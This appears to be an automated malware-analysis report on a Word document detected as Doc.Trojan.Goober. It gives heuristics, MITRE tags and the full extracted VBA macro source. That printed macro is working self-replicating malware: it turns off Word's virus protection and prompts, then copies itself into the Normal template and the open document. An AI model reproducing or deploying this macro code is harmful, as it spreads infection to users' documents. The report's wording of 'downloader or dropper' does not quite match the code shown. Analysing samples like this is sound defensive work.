MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is an OLE document containing VBA macros, specifically a Document_Open macro. This macro attempts to write its own code to 'C:\G00ber.sys' and then execute it. This behavior is indicative of a downloader or droppper malware. The ClamAV detection of 'Doc.Trojan.Goober-2' further supports this assessment.
Heuristics 3
-
ClamAV: Doc.Trojan.Goober-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Goober-2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3504 bytes |
SHA-256: b62845341728936842ae5c348899669d0b8a2f3864c88fbfbce13a44ad9d21ba |
|||
|
Detection
ClamAV:
Doc.Trojan.Goober-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Function SetCursorPos Lib "USER32" _
(ByVal x As Long, ByVal y As Long) As Long
Private Declare Function GetCursorPos Lib "USER32" _
(lpPoint As Punkt) As Long
Private Type Punkt
xAchse As Long
yAchse As Long
End Type
Private Declare Sub Sleep Lib "kernel32" _
(ByVal dwMilliseconds As Long)
Private Sub document_Open(): On Error Resume Next:
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
Options.ConfirmConversions = (0 - 0)
Options.SaveNormalPrompt = (1 - 1)
Options.VirusProtection = (2 - 2)
Open "C:\G00ber.sys" For Output As #1: Print #1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines): Close #1
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines: ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromFile ("C:\G00ber.sys"): ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromFile ("C:\G00ber.sys"): ActiveDocument.SaveAs FileName = ActiveDocument.FullName
Set myRange = ActiveDocument.Range(Start:=0, End:=0)
With myRange.Find
.ClearFormatting
.Text = "ShiThe!"
With .Replacement
.ClearFormatting
.Text = "The"
End With
.Execute Replace:=wdReplaceAll, Format:=True, MatchCase:=True, _
MatchWholeWord:=True
End With
With myRange.Find
.ClearFormatting
.Text = "shithe!"
With .Replacement
.ClearFormatting
.Text = "the"
End With
.Execute Replace:=wdReplaceAll, Format:=True, MatchCase:=True, _
MatchWholeWord:=True
End With
End Sub
Private Sub document_New(): On Error Resume Next:
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
Options.ConfirmConversions = (0 - 0)
Options.SaveNormalPrompt = (1 - 1)
Options.VirusProtection = (2 - 2)
Open "C:\G00ber.sys" For Output As #1: Print #1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines): Close #1
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines: ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromFile ("C:\G00ber.sys"): ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromFile ("C:\G00ber.sys"): ActiveDocument.SaveAs FileName = ActiveDocument.FullName
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.